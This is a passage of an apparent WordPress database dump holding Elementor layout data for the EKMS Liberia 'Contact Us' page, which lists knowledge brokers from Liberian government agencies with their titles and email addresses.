image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14958,2375,'_elementor_edit_mode','builder'),(14959,2375,'_elementor_template_type','wp-page'),(14960,2375,'_elementor_version','2.7.5'),(14961,2375,'_wp_page_template','default'),(14962,2375,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge 